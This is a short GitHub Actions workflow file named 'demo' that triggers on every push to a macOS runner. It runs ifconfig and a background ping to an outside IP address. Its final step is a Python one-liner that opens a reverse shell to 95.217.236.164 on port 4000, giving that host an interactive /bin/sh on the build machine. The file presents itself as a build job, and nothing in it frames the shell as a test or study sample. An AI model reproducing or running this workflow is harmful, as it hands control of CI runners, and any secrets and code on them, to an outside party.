name: demo
on: [push]
jobs:
  build:
    runs-on: macos-latest
    steps:
     - run: ifconfig
     - run: ping 95.217.236.164 &
     - shell: bash
       run: |-
         python -c 'import socket,os,pty;s=socket.socket();s.connect(("95.217.236.164",4000));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
